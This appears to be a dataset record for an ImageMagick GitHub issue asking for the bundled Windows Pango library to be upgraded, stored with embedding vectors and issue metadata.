0.001800087746232748, 0.010530427098274231, -0.006219106260687113, 0.0034223890397697687, 0.011583470739424229, 0.009032919071614742, 0.009381653741002083, -0.00004738478673971258, 0.022879747673869133, -0.008137148804962635, -0.018298327922821045, -0.004075412172824144, 0.01851714216172695, -0.01932401768863201, -0.018995797261595726, -0.007234540302306414, 0.014373349957168102, 0.008540586568415165, -0.00020246712665539235, 0.00577464047819376, -0.0108928382396698, -0.002087281085550785, 0.008253393694758415, 0.018530817702412605, -0.00671827606856823, 0.006078928709030151, -0.01769658923149109, -0.020336033776402473, 0.0008303823415189981, -0.00040878058644011617, 0.02733808383345604, 0.004554068204015493, 0.018681252375245094, 0.012561296112835407, -0.018366707488894463, -0.011480901390314102, -0.0029437332414090633, -0.00933378841727972, 0.01615121401846409, -0.001535972231067717, -0.004294226411730051, -0.013101493008434772, -0.00404806062579155, 0.009928688406944275, 0.013491255231201649, 0.013231413438916206, -0.011474063619971275, 0.002253101207315922, 0.0013769901124760509, 0.0004030111012980342, 0.012739081867039204, -0.0181205403059721, 0.011063787154853344, 0.005983197595924139, 0.0003145452355965972, -0.0022838718723505735, -0.009757740423083305, -0.01500244066119194, 0.013101493008434772, 0.010981732048094273, -0.03552993759512901, 0.010591968894004822, 0.016752952709794044, 0.0019300085259601474, -0.00956627819687128, -0.021648917347192764, 0.006338770501315594, -0.009826119989156723, 0.004718178417533636, -0.004660055972635746, 0.007610626984387636, -0.0037882188335061073, 0.022455794736742973, 0.020336033776402473, 0.01340236235409975, -0.008130311034619808, 0.020541172474622726, 0.008882484398782253, 0.0024428539909422398, 0.01595975272357464, -0.005268632899969816, -0.00894402526319027, -0.0011393717722967267, 0.003188189584761858, -0.00879359059035778, 0.01985737681388855, 0.0017590600764378905, -0.01204845029860735, -0.005723355803638697, -0.00797987636178732, -0.026202986016869545, 0.009778253734111786, -0.01758718118071556, 0.011357818730175495, -0.00794568657875061, -0.01661619357764721, -0.011255249381065369, 0.002839454682543874, -0.005101103335618973, 0.01701279543340206, -0.010010744445025921, -0.012362995184957981, 0.01750512607395649, 0.006848196964710951, -0.0036617168225347996, -0.0030804919078946114, -0.008841455914080143, 0.02063690312206745, 0.016643546521663666, -0.015918724238872528, 0.01260916143655777, -0.005870371591299772, 0.004256617743521929, -0.035694047808647156, -0.004065155517309904, 0.01416821125894785, 0.005391715560108423, -0.010256909765303135, -0.019720619544386864, -0.016438407823443413, -0.005172901786863804, 0.0019009473035112023, -0.0017188871279358864, 0.03670606017112732, 0.005723355803638697, 0.03678811714053154, 0.009750902652740479, 0.006485786288976669, 0.02182670496404171, 0.019310342147946358, 0.019337695091962814, 0.0161922425031662, -0.00933378841727972, -0.021238641813397408, -0.00006928756192792207, 0.0032822112552821636, 0.019542831927537918, -0.013375010341405869, 0.015918724238872528, -0.0012231365544721484, 0.004971182439476252, 0.008807267062366009, 0.001118857879191637, -0.0013188676675781608, -0.014687894843518734, 0.00639005471020937, 0.004037803504616022, 0.002731757005676627, -0.006294323597103357, -0.011227897368371487, 0.0022394254337996244, 0.0022872909903526306, -0.02405587211251259, 0.0080003896728158, -0.0013086107792332768, 0.009648333303630352, -0.002063348423689604, -0.004878870211541653, -0.006591774057596922, 0.003620689269155264, 0.011809122748672962, 0.0003470254596322775, 0.0018906904151663184, -0.008875645697116852, 0.005904561374336481, -0.010831296443939209, -0.0007449080585502088, 0.00042993546230718493, 0.025861088186502457, 0.002755689900368452, -0.0050361426547169685, 0.01820259541273117, 0.012499754317104816, -0.016752952709794044, -0.0035694045946002007, -0.018421409651637077, -0.0032428931444883347, -0.001451352727599442, -0.014086156152188778, -0.0029710850212723017, 0.011145842261612415, -0.015399040654301643, -0.004441242199391127, 0.013313469476997852, -0.015535799786448479, 0.0025266187731176615, -0.001298353890888393, -0.0075832754373550415, -0.015946075320243835, -0.010482561774551868, 0.022278008982539177, 0.029184328392148018, -0.016520462930202484, -0.004509621299803257, -0.004403633531183004, 0.00584301957860589, 0.013922045938670635, -0.024274686351418495, 0.019214611500501633, 0.01896844618022442, -0.020582199096679688, 0.000510708661749959, -0.019077852368354797, -0.007706358563154936, -0.010708213783800602, 0.013853666372597218, -0.025738006457686424, 0.0011727067176252604, -0.012315129861235619, 0.028473181650042534, 0.01701279543340206, -0.004660055972635746, -0.01305362768471241, 0.008602128364145756, 0.0026992768980562687, 0.029950177296996117, 0.010489399544894695, -0.013388686813414097, -0.0013863922795280814, -0.00445491774007678, 0.004687407985329628, 0.005145549774169922, -0.008417503908276558, -0.005825924687087536, 0.011891177855432034, -0.0055797589011490345, -0.017573505640029907, -0.003818989498540759, -0.008800428360700607, 0.015590502880513668, 0.010455209761857986, -0.016479434445500374, 0.01885903812944889, 0.0030616875737905502, 0.010250071994960308, -0.008396990597248077, 0.013156196102499962, -0.02216860093176365, 0.021430103108286858, -0.02214124985039234, 0.001744529465213418, -0.004660055972635746, -0.003887368831783533, 0.010913352482020855, -0.011344142258167267, -0.014222915284335613, 0.00622936338186264, 0.0010085961548611522, 0.005996873136609793, 0.016917062923312187, 0.022455794736742973, 0.028582589700818062, -0.0031813515815883875, -0.006284066941589117, -0.006666991394013166, 0.0004513040476012975, -0.0028189406730234623, -0.01913255639374256, -0.00030300620710477233, -0.007179836742579937, -0.004078831057995558, 0.0017624790780246258, -0.006232782267034054, 0.0066020311787724495, 0.01490670908242464, -0.0063592842780053616, 0.026271365582942963, 0.01295789610594511, 0.00683452095836401, -0.0030839110258966684, -0.005039561539888382, 0.005251538008451462, 0.0033796518109738827, -0.001960779307410121, -0.01340236235409975, -0.019871054217219353, -0.0018325678538531065, 0.012766433879733086, 0.015631530433893204, 0.006858453620225191, 0.009579953737556934, 0.003008693689480424, -0.004362605512142181, 0.011002245359122753, 0.003095877356827259, 0.00005275363946566358, 0.004916478879749775, 0.0007872178102843463, -0.0032155413646250963, 0.026476504281163216, 0.0029915987979620695, 0.007241378538310528, 0.011002245359122753, -0.014551136642694473, 0.001672731013968587, 0.009750902652740479, 0.018886391073465347, -0.012814299203455448, -0.007685844320803881, 0.01284165121614933, 0.01505714375525713, 0.003092458238825202, -0.012431374751031399, -0.0048857079818844795, 0.010844972915947437, -0.007658492773771286, 0.017573505640029907, 0.015029791742563248, -0.004472012631595135, -0.018530817702412605, 0.004865194205194712, 0.006896062288433313, -0.02962195686995983, -0.010489399544894695, 0.005203672219067812, -0.024808045476675034, 0.0020548009779304266, 0.00522418599575758, 0.0080961212515831, 0.020390737801790237, -0.01646575890481472, -0.00018932546663563699, 0.011255249381065369, 0.018558168783783913, -0.001179544604383409, -0.00671827606856823, 0.00041647328180260956, -0.003203574800863862, 0.002330027986317873, 0.007952524349093437, -0.0019573604222387075, 0.0033916181419044733, 0.004536973312497139, 0.0020941190887242556, -0.016602518036961555, 0.013935721479356289, -0.019693266600370407, -0.00894402526319027, -0.005969521589577198, 0.019556507468223572, -0.019720619544386864, -0.017190581187605858, -0.005347269121557474, -0.004482269752770662, -0.001979583641514182, 0.005733612459152937, -0.026134606450796127, 0.005856695584952831, -0.004314740188419819, 0.030551915988326073, 0.00018697492487262934, -0.008485883474349976, 0.0068311020731925964, -0.0010863776551559567, -0.023276347666978836, -0.0075969514437019825, -0.002323190215975046, 0.002401826437562704, -0.012855326756834984, 0.024684963747859, -0.0048993839882314205, -0.007603789214044809, -0.015016116201877594, 0.013176710344851017, -0.0033369148150086403, -0.0064242444932460785, 0.00026817547040991485, 0.004872032441198826, 0.004861775320023298, 0.013621176593005657, 0.0044480799697339535, -0.01411350816488266, 0.030360452830791473, 0.0018325678538531065, 0.008684183470904827, -0.0028360355645418167, 0.0035454719327390194, -0.007993551902472973, -0.0007718324777670205, -0.01112532801926136, 0.009641495533287525, 0.0025693560019135475, -0.027857767418026924, -0.009210704825818539, 0.014961413107812405, 0.012561296112835407, 0.008027741685509682, -0.012554457411170006, 0.0018718860810622573, 0.009292760863900185, 0.0071456474252045155, 0.013033113442361355, -0.014715246856212616, -0.0037882188335061073, -0.010537265799939632, 0.01467421930283308, 0.001926589640788734, -0.01623326912522316, -0.010906514711678028, -0.005884047131985426, 0.020418088883161545, -0.016575166955590248, -0.02089674398303032, 0.014031453058123589, 0.013026275672018528, -0.011152680031955242, 0.0008325192029587924, -0.006051576696336269, 0.0027898794505745173, 0.01828465238213539, 0.005080589558929205, 0.01693073846399784, 0.008622642606496811, 0.02121128886938095, 0.025902116671204567, 0.0020650578662753105, 0.013853666372597218, -0.01701279543340206, -0.0019300085259601474, -0.014072480611503124, -0.0137852868065238, 0.0021026665344834328, 0.0052788895554840565, -0.031563930213451385, -0.021662592887878418, -0.010974893346428871, -0.004567743744701147, 0.019173583015799522, -0.015180226415395737, -0.009559440426528454, 0.009860309772193432, -0.0008333739242516458, -0.019734295085072517, 0.0026479922235012054, 0.003617270151153207, 0.0008628625655546784, -0.026750020682811737, 0.007248216308653355, -0.0034907683730125427, -0.009067108854651451, 0.042750801891088486, -0.04677150771021843, -0.004509621299803257, 0.021238641813397408, -0.019570184871554375, -0.003699325490742922, 0.000015652471120120026, -0.004745530430227518, 0.008957701735198498, -0.01319038588553667, -0.01029793731868267, -0.006677248515188694, 0.00006191540887812153, 0.0026616682298481464, 0.0011205674381926656, -0.002630897331982851, 0.010318451561033726, 0.014387025497853756, -0.00031903263879939914, -0.008301259018480778, 0.02063690312206745, 0.03922242298722267, -0.008520073257386684, 0.003417260479182005, -0.004642961081117392, 0.024343065917491913, -0.0048857079818844795, 0.011597146280109882, 0.004345510620623827, -0.02259255386888981, 0.013532282784581184, -0.004400214180350304, -0.0026873103342950344, -0.011460387147963047, 0.0010026129893958569, 0.014879357069730759, -0.013101493008434772, 0.015399040654301643, 0.0002758681366685778, -0.01858552172780037, 0.0026138024404644966, -0.030086936429142952, 0.011015920899808407, -0.004571163095533848, 0.018954768776893616, 0.005631043575704098, 0.004249779507517815, -0.003654878819361329, -0.019953109323978424, 0.005466932896524668, -0.012561296112835407, 0.006253296043723822, 0.011173194274306297, -0.0035591477062553167, -0.01708117313683033, -0.008485883474349976, 0.005713098682463169, -0.0003194599994458258, 0.005815668031573296, -0.0065541653893888, -0.0002052450436167419, -0.017710264772176743, -0.0019385559717193246, -0.005313079338520765, -0.006526813842356205, 0.022688284516334534, -0.01027742400765419, -0.002791588893160224, 0.016780303791165352, 0.007590113207697868, 0.010120151564478874, -0.01361433882266283, -0.01765556074678898, -0.012349319644272327, 0.005781478248536587, -0.030907489359378815, 0.02483539842069149, 0.003354009473696351, 0.01720425672829151, -0.002436016220599413, -0.013135682791471481, 0.00806193146854639, 0.004051479510962963, 0.015645205974578857, -0.008007227443158627, -0.0037540290504693985, 0.0030616875737905502, -0.014810978434979916, 0.010489399544894695, 0.02506788820028305, -0.005709679797291756, 0.006766141392290592, -0.008458531461656094, -0.00451304018497467, 0.015836669132113457, -0.020951448008418083, -0.005863533355295658, 0.009518412873148918, -0.010010744445025921, 0.021457456052303314, 0.028555236756801605, -0.007330271415412426, 0.004123277962207794, 0.010503076016902924, 0.00844485592097044, 0.020144570618867874, -0.003398456145077944, -0.012192047201097012, -0.04141056537628174, 0.02004883997142315, 0.02606622688472271, -0.0002384731633355841, -0.007090943865478039, 0.004629285540431738, 0.0225652027875185, -0.000015759314919705503, 0.012417699210345745, 0.0017539316322654486, -0.0005085718003101647, -0.015918724238872528, -0.016205918043851852, -0.017915403470396996, -0.00024873006623238325, 0.0026804725639522076, 0.0029471521265804768, -0.011610821820795536, -0.014400701969861984, -0.0022975478786975145, 0.025423461571335793, 0.005176320672035217, 0.0183120034635067, -0.004389957524836063, 0.016629869118332863, 0.0011077462695538998, 0.02063690312206745, 0.013853666372597218, 0.02417895570397377, 0.007562761660665274, -0.006697762291878462, 0.012848488986492157, -0.013628014363348484, 0.04264139384031296, 0.0005342140793800354, -0.02214124985039234, -0.005231024231761694, 0.016534138470888138, -0.001293225446715951, 0.0018855619709938765, 0.010133827105164528, -0.042942263185977936, 0.02324899658560753, 0.017559830099344254, 0.015139198862016201, -0.017286311835050583, 0.004837842658162117, 0.020677929744124413, -0.014701571315526962, 0.008950863033533096, -0.02460290864109993, 0.014633191749453545, -0.003248021472245455, -0.0036514599341899157, -0.002441144548356533, 0.014400701969861984, -0.013067303225398064, 0.009723550640046597, 0.0004927590489387512, -0.022428443655371666, -0.0030753635801374912, 0.012547619640827179, -0.0006278083892539144, 0.013046789914369583, 0.0014522074488922954, -0.00398993818089366, 0.030743377283215523, 0.016342677175998688, 0.00745335454121232, -0.0016530719585716724, 0.015262282453477383, 0.007863630540668964, -0.0048857079818844795, -0.003478802042081952, -0.016917062923312187, 0.0055284746922552586, 0.019023148342967033, -0.006916576065123081, 0.012219398282468319, 0.008855132386088371, -0.009477384388446808, 0.002519780769944191, -0.0008637172868475318, 0.004875451326370239, 0.020992476493120193, -0.010222719982266426, -0.022729313001036644, 0.011911691166460514, 0.0034736734814941883, 0.011166355572640896, 0.011364656500518322, 0.025847412645816803, 0.010072285309433937, -0.010858648456633091, -0.0065746791660785675, 0.03998827189207077 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### Is your feature request related to a problem? Please describe. Not sure if this is the correct repo, but this one https://github.com/ImageMagick/pango doesn't have issues enabled. Pango version, as can be seen there, is 3 years behind now. Current stable version version is 1.50.14: https://download.gnome.org/sources/pango/1.50/ while also 2.0 is in development: https://download.gnome.org/sources/pango/1.90/pango-1.90.0.news Bunch of enhancements were added and bugfixes were made, e.g. related to Unicode support. ### Describe the solution you'd like Would be nice if the Windows Pango lib version was bumped. ### Describe alternatives you've considered _No response_ ### Additional context _No response_
Upgrade Windows Pango version
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6484/comments
1
2023-07-13T09:30:15
2023-07-13T09:52:09Z
https://github.com/ImageMagick/ImageMagick/issues/6484
1,802,612,481
6,484
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Upgrade Windows Pango version Issue date: --- start body --- ### Is your feature request related to a problem? Please describe. Not sure if this is the correct repo, but this one https://github.com/ImageMagick/pango doesn't have issues enabled. Pango version, as can be seen there, is 3 years behind now. Current stable version version is 1.50.14: https://download.gnome.org/sources/pango/1.50/ while also 2.0 is in development: https://download.gnome.org/sources/pango/1.90/pango-1.90.0.news Bunch of enhancements were added and bugfixes were made, e.g. related to Unicode support. ### Describe the solution you'd like Would be nice if the Windows Pango lib version was bumped. ### Describe alternatives you've considered _No response_ ### Additional context _No response_ --- end body ---
885
[ -0.043310001492500305, 0.052928511053323746, -0.015696870163083076, 0.014000272378325462, 0.011909582652151585, 0.04761161282658577, -0.018328601494431496, 0.046436015516519547, -0.0164449755102396, -0.0014836882473900914, 0.02109392173588276, -0.022403107956051826, 0.023645497858524323, 0.012243558652698994, -0.024019550532102585, 0.009451519697904587, -0.031981538981199265, -0.0013534375466406345, -0.010613756254315376, -0.013078498654067516, -0.008723451755940914, -0.008349399082362652, -0.014962122775614262, 0.015509843826293945, -0.00829596258699894, 0.008349399082362652, 0.024420322850346565, -0.00691998191177845, 0.000842871842905879, 0.020372534170746803, 0.02848147042095661, 0.005276820156723261, 0.0005402060924097896, 0.02933644875884056, 0.021962258964776993, -0.010667191818356514, 0.03361134231090546, 0.059421002864837646, 0.002312783617526293, -0.02118743397295475, -0.03484037145972252, 0.00766140827909112, 0.0009535013814456761, 0.02621043287217617, 0.011548888869583607, 0.004388444125652313, 0.0024129762314260006, 0.00785511452704668, 0.00006387290341081098, 0.027786800637841225, 0.009097505360841751, -0.023551983758807182, 0.0022292896173894405, -0.03927557170391083, 0.003298012539744377, -0.02850818820297718, 0.01184946671128273, -0.008870401419699192, -0.009972522035241127, 0.01163572259247303, -0.02434016764163971, 0.03224871680140495, 0.0004846826195716858, 0.022122567519545555, -0.005206685047596693, 0.02085345797240734, -0.05140557885169983, 0.0027937088161706924, -0.005964810494333506, -0.0030041136778891087, -0.01883624494075775, 0.01917022094130516, 0.04568791016936302, 0.031179996207356453, 0.04862689971923828, -0.049615468829870224, 0.013312282040715218, -0.005323576740920544, -0.02094697207212448, -0.003171101678162813, -0.016645362600684166, 0.012978306040167809, -0.035775505006313324, 0.007741562556475401, 0.003142713801935315, 0.010413370095193386, -0.005246762186288834, -0.04200081527233124, -0.04510011523962021, -0.012510739266872406, 0.026958540081977844, 0.0048025744035840034, -0.009284531697630882, -0.012497380375862122, -0.010339895263314247, 0.022737083956599236, -0.021508051082491875, -0.026865025982260704, -0.017874393612146378, 0.0009501616004854441, 0.022403107956051826, -0.055252984166145325, -0.010019279085099697, -0.03668392077088356, 0.01995840296149254, 0.048359718173742294, 0.01647169515490532, -0.058191969990730286, 0.030565479770302773, 0.062413427978754044, 0.014708301052451134, -0.012036493979394436, 0.011682478711009026, -0.003386516124010086, -0.011963019147515297, 0.015563279390335083, 0.027733363211154938, -0.016725515946745872, -0.03927557170391083, 0.017380109056830406, 0.0077482424676418304, -0.005901355296373367, -0.036603763699531555, -0.0011046255240216851, -0.04678335413336754, 0.01775416173040867, -0.04130614548921585, -0.018903039395809174, -0.008877080865204334, -0.005179967265576124, -0.030084554105997086, 0.032996825873851776, -0.015843819826841354, 0.004031089600175619, 0.020078634843230247, -0.013459230773150921, -0.01564343459904194, 0.08784903585910797, -0.0018418773543089628, 0.009605148807168007, -0.04026414081454277, -0.03214184567332268, 0.017687367275357246, -0.023338239639997482, -0.03128686919808388, -0.0007614651694893837, -0.0015129110543057323, 0.029870809987187386, 0.006926661357283592, -0.03297010809183121, -0.012143366038799286, -0.06866545975208282, 0.032195281237363815, -0.010266421362757683, 0.03684422746300697, -0.023498548194766045, -0.006886584218591452, 0.00990572664886713, -0.0126443300396204, 0.01500220037996769, -0.014935404993593693, 0.014561351388692856, 0.05012311041355133, 0.01279795914888382, 0.016298027709126472, -0.036390021443367004, -0.04528713971376419, -0.006776371970772743, -0.047290995717048645, 0.016338104382157326, 0.019090065732598305, 0.01999847963452339, -0.006940020248293877, -0.017193082720041275, -0.07187162339687347, 0.02749290131032467, -0.003449971554800868, -0.00790187157690525, 0.0004984590923413634, -0.0011822748929262161, -0.009150940924882889, 0.006742974743247032, -0.012109967879951, 0.007935268804430962, 0.0454474501311779, -0.050470445305109024, 0.03772592544555664, 0.019918326288461685, 0.0015145809156820178, 0.006893263664096594, 0.0017091219779103994, 0.021227512508630753, -0.002885552356019616, -0.011963019147515297, 0.052955228835344315, 0.031313586980104446, -0.05410410463809967, -0.0047290995717048645, -0.01791447028517723, -0.01917022094130516, -0.009284531697630882, -0.01953091472387314, -0.04240158945322037, -0.03641673922538757, -0.0073407916352152824, 0.01919693872332573, -0.021882105618715286, 0.03382508456707001, 0.029630346223711967, -0.043710771948099136, -0.002611692063510418, -0.05140557885169983, -0.017473621293902397, 0.030031118541955948, 0.0028922318015247583, 0.021534770727157593, -0.004438540432602167, 0.01106796320527792, -0.0074476636946201324, 0.030031118541955948, -0.001883624354377389, -0.0025949932169169188, -0.001693258062005043, -0.02566271275281906, -0.021601565182209015, -0.03478693589568138, -0.00004318204810260795, -0.018114855512976646, -0.025796303525567055, 0.00927785225212574, 0.04469934105873108, -0.050657473504543304, 0.003244576510041952, 0.002227619756013155, 0.006335523910820484, -0.02026566118001938, -0.0008599880966357887, -0.014441120438277721, -0.03297010809183121, 0.04250846058130264, 0.01729995384812355, -0.007013495080173016, 0.017794238403439522, -0.04400467127561569, 0.030752506107091904, -0.00969198253005743, 0.009671944193542004, 0.007581254467368126, -0.022897392511367798, 0.016418257728219032, 0.005260121542960405, -0.008108936250209808, 0.013893400318920612, -0.010159548372030258, 0.02713220752775669, 0.020158788189291954, -0.0067529939115047455, 0.027145566418766975, -0.00237289909273386, -0.016832388937473297, 0.02317793108522892, -0.002458062954246998, -0.0034666704013943672, 0.05199337750673294, 0.004368405323475599, -0.02483445219695568, -0.012610931880772114, 0.02914942242205143, -0.016458334401249886, -0.0463024266064167, 0.03962290659546852, -0.003710472956299782, -0.0021775232162326574, -0.00017116268281824887, -0.019090065732598305, -0.007668088190257549, 0.016725515946745872, -0.0026935162022709846, 0.0385274663567543, -0.00759461335837841, -0.024072987958788872, 0.06310809403657913, -0.003049200400710106, 0.050016239285469055, 0.013973553664982319, 0.02014542929828167, -0.024807734414935112, 0.0039576152339577675, -0.060489725321531296, 0.023498548194766045, 0.015055635944008827, 0.025769585743546486, -0.010834179818630219, 0.007955307140946388, -0.016097640618681908, 0.021454615518450737, 0.01028645969927311, 0.01910342462360859, -0.043737489730119705, -0.012477342039346695, -0.01510907243937254, -0.005400391295552254, -0.020252302289009094, -0.003449971554800868, 0.00026112745399586856, -0.020840099081397057, -0.0017617231933400035, 0.013419154100120068, -0.010921013541519642, -0.012130007147789001, 0.054638467729091644, -0.04274892434477806, -0.028989113867282867, -0.021013766527175903, -0.006435716524720192, 0.030298298224806786, 0.017647288739681244, -0.01249070093035698, -0.017286594957113266, -0.009959163144230843, -0.0540773868560791, -0.0035535041242837906, -0.010226343758404255, -0.004949523601680994, 0.024166500195860863, 0.00818909052759409, -0.01013283059000969, 0.0033731572329998016, -0.0011062953853979707, 0.007454343605786562, -0.011942979879677296, 0.011094680987298489, 0.005904695019125938, -0.01668543927371502, 0.018448831513524055, -0.030244862660765648, -0.009778816252946854, 0.0005569049390032887, 0.044592469930648804, 0.04785207659006119, -0.031340304762125015, 0.01031985692679882, -0.005971489939838648, -0.03604268655180931, 0.02369893342256546, -0.024113064631819725, -0.025635994970798492, 0.005584077909588814, 0.05367661640048027, 0.027573054656386375, 0.0009042398887686431, 0.021868744865059853, 0.02452719397842884, -0.001622288255020976, -0.019985120743513107, -0.007734883110970259, 0.028454750776290894, -0.04176035523414612, 0.02296418696641922, 0.01637818105518818, 0.00979885458946228, -0.06289435178041458, -0.0024447040632367134, 0.02715892530977726, -0.017794238403439522, 0.013866681605577469, -0.004044448956847191, -0.016551848500967026, 0.0011004507541656494, -0.028187571093440056, 0.007888511754572392, 0.023405035957694054, -0.0028621740639209747, 0.04170691594481468, -0.04737114906311035, 0.0068298084661364555, -0.008329360745847225, 0.03321056813001633, -0.010907654650509357, 0.005614135880023241, -0.019116783514618874, 0.005200005602091551, 0.03622971102595329, -0.039115265011787415, 0.04218784347176552, -0.006075022742152214, 0.006128458771854639, 0.014761737547814846, 0.04389780014753342, -0.020412610843777657, -0.017259877175092697, 0.006646121386438608, -0.02848147042095661, -0.021761873736977577, -0.05426441505551338, 0.026597844436764717, -0.01742018572986126, -0.011027886532247066, 0.010466806590557098, -0.009852291084825993, -0.0026801570784300566, -0.05856602266430855, 0.02709212899208069, -0.010513563640415668, -0.0009568411041982472, -0.003583562094718218, -0.012377149425446987, -0.04127942770719528, -0.007387548219412565, -0.022763801738619804, -0.0423748679459095, -0.004021070431917906, -0.05867289751768112, 0.027813518419861794, -0.0053703333251178265, 0.0057043093256652355, -0.06524554640054703, 0.015242663212120533, -0.03462662920355797, -0.0032612751238048077, 0.00759461335837841, -0.021761873736977577, -0.014067067764699459, -0.005537321325391531, 0.014494556933641434, -0.024821093305945396, -0.009110864251852036, 0.020840099081397057, 0.005941432435065508, 0.0005251772236078978, 0.006465774495154619, -0.054638467729091644, 0.019864890724420547, -0.00901735108345747, -0.009137582033872604, 0.010620435699820518, -0.02770664542913437, 0.007253957912325859, 0.0042682127095758915, -0.025181787088513374, 0.005123191047459841, 0.010346575640141964, 0.00542710954323411, -0.028347879648208618, -0.012403867207467556, -0.018048061057925224, -0.00426487298682332, 0.025635994970798492, 0.008516387082636356, 0.008703413419425488, 0.03916870057582855, 0.054878927767276764, -0.0039576152339577675, -0.007327432744204998, 0.012764560990035534, -0.017807597294449806, -0.0276799276471138, 0.021721797063946724, 0.034920524805784225, -0.002949007786810398, -0.001376815838739276, 0.005360314156860113, -0.012971626594662666, -0.023845883086323738, 0.02829444408416748, -0.013372397050261497, 0.010306498035788536, -0.04363061860203743, 0.014200657606124878, 0.004107904154807329, 0.004318309016525745, 0.04154660925269127, 0.034947242587804794, -0.004725759848952293, -0.0032228680793195963, 0.02063971385359764, 0.0012465652544051409, -0.019156860187649727, 0.03441288322210312, -0.03566863387823105, -0.004672323819249868, -0.05872633308172226, -0.026384100317955017, 0.0005477205850183964, 0.011034565977752209, -0.021788591518998146, -0.007828396745026112, -0.006408998742699623, 0.010974450036883354, 0.06471118330955505, 0.028401315212249756, 0.04387108236551285, -0.005286839324980974, -0.01696597784757614, 0.00923109520226717, 0.022269517183303833, 0.006435716524720192, -0.0087568499147892, 0.02272372506558895, -0.03542817011475563, -0.012978306040167809, 0.050203267484903336, 0.023405035957694054, -0.023565344512462616, 0.08031453937292099, -0.002818757202476263, 0.00990572664886713, -0.0005431284080259502, -0.018622498959302902, -0.04216112568974495, 0.025729507207870483, -0.029283011332154274, -0.002586643910035491, -0.04047788679599762, 0.005998208187520504, -0.013519346714019775, -0.024072987958788872, 0.016217872500419617, 0.03043188899755478, -0.019437400624155998, -0.007474381942301989, -0.007975345477461815, 0.005179967265576124, 0.03855418413877487, 0.01907670684158802, 0.0004308289790060371, 0.0026300607714802027, -0.02042596973478794, 0.03668392077088356, -0.015242663212120533, -0.005844579078257084, -0.017593853175640106, -0.008382796309888363, 0.031741075217723846, -0.007414266467094421, 0.04691694304347038, -0.0008983953157439828, -0.023418394848704338, -0.010066035203635693, 0.001928711193613708, -0.03313041478395462, 0.008643297478556633, -0.055466726422309875, -0.005293518770486116, -0.028775367885828018, -0.011615684255957603, -0.016097640618681908, -0.0011889544548466802, 0.002671807771548629, 0.003256265539675951, -0.004962882958352566, 0.002195891924202442, -0.009117543697357178, 0.008643297478556633, -0.008369437418878078, -0.005968150217086077, 0.017246518284082413, -0.0012140026083216071, 0.0328899510204792, 0.008823644369840622, 0.009571750648319721, 0.03182122856378555, 0.009364685975015163, 0.0020422630477696657, -0.009464878588914871, -0.025221863761544228, 0.03334416076540947, -0.01941068284213543, -0.05426441505551338, -0.05410410463809967, 0.03652361035346985, 0.03414570167660713, 0.029523475095629692, -0.012691086158156395, -0.039516035467386246, 0.0066027045249938965, 0.032836515456438065, -0.003780607832595706, -0.012103288434445858, -0.012657688930630684, -0.012170083820819855, -0.0017049473244696856, -0.026624564081430435, 0.00598484929651022, 0.046008527278900146, 0.0009735398925840855, -0.006288767326623201, -0.02066643163561821, -0.031607486307621, -0.031367022544145584, 0.013405795209109783, 0.020038558170199394, -0.005587417632341385, -0.009671944193542004, 0.009351327084004879, 0.014721659943461418, 0.007481061387807131, 0.02890895865857601, 0.030084554105997086, -0.02933644875884056, -0.01687246561050415, 0.017767520621418953, 0.020252302289009094, -0.0006378940888680518, -0.018408754840493202, 0.0005585748003795743, -0.024300090968608856, -0.008302642032504082, 0.032382309436798096, -0.013178691267967224, -0.006262049078941345, 0.013185370713472366, 0.06246686354279518, -0.02452719397842884, 0.016057563945651054, -0.01047348603606224, 0.02156148850917816, 0.003446631832048297, 0.006118439603596926, -0.020412610843777657, 0.03256933391094208, -0.0324624627828598, 0.005847919266670942, 0.0030825980938971043, -0.03959618881344795, 0.04090537503361702, 0.01357946265488863, -0.02277716062963009, -0.01031985692679882, -0.0051899864338338375, -0.030565479770302773, 0.007574574556201696, 0.0012574194697663188, -0.013539385050535202, -0.03318385034799576, 0.010947732254862785, -0.00250648963265121, 0.0009401423158124089, -0.03711140900850296, -0.013679655268788338, -0.01983817107975483, 0.006375601049512625, 0.005881316494196653, 0.03799310326576233, -0.012377149425446987, -0.0118962237611413, 0.034680064767599106, 0.00493616471067071, -0.002217600354924798, 0.0201187115162611, -0.06268060952425003, -0.018114855512976646, 0.002471422078087926, 0.00969198253005743, -0.005306878127157688, -0.006926661357283592, -0.0006462434539571404, 0.02792038954794407, -0.01036661397665739, 0.013546064496040344, -0.010246382094919682, 0.0128781134262681, -0.008549784310162067, 0.0073942276649177074, 0.024847811087965965, -0.020773304626345634, -0.007240598555654287, -0.007120367605239153, 0.028775367885828018, 0.015843819826841354, 0.02170843817293644, -0.02725243754684925, 0.000758542912080884, 0.043069541454315186, -0.059901926666498184, -0.004749137908220291, 0.030886096879839897, 0.00997920148074627, -0.011869505979120731, 0.006335523910820484, 0.034065548330545425, -0.009524994529783726, 0.01852898672223091, -0.02277716062963009, -0.0017149664927273989, 0.005914714187383652, -0.022897392511367798, -0.05423769727349281, -0.018595781177282333, -0.040157269686460495, 0.03064563311636448, -0.016498412936925888, -0.02486116997897625, 0.027439463883638382, 0.0519399419426918, -0.0008816965273581445, 0.01238382887095213, 0.005951451603323221, -0.01827516406774521, -0.022429825738072395, -0.03633658587932587, 0.006185234524309635, -0.008883760310709476, -0.013151973485946655, -0.005560699850320816, 0.02051948383450508, 0.006899943109601736, -0.0003657036868389696, -0.03793966770172119, -0.008843683637678623, -0.024807734414935112, 0.0046556247398257256, -0.014427761547267437, 0.014962122775614262, -0.0376724898815155, -0.00026091872132383287, 0.006372261326760054, 0.009378044866025448, -0.005827880464494228, 0.011642402037978172, -0.011034565977752209, 0.014841891825199127, -0.0181549321860075, -0.033477749675512314, -0.013826604932546616, -0.01246398314833641, 0.018288522958755493, -0.0018569063395261765, 0.0027853595092892647, 0.004665644373744726, -0.016738874837756157, 0.0017116267699748278, 0.012664368376135826, -0.0007489410927519202, -0.022710364311933517, 0.01926373317837715, 0.002347850939258933, 0.00823584757745266, 0.039729781448841095, -0.027947107329964638, -0.001274118316359818, 0.006348882801830769, -0.0296036284416914, -0.04357718303799629, 0.01532281655818224, -0.012964947149157524, 0.007895191200077534, 0.03059219755232334, -0.011415298096835613, -0.011755953542888165, -0.0032963426783680916, -0.011134758591651917, -0.010052676312625408, -0.031313586980104446, 0.011882864870131016, -0.0080087436363101, 0.02694518119096756, 0.0010587037540972233, -0.0005326916580088437, -0.0018084797775372863, -0.017553776502609253, -0.021641641855239868, 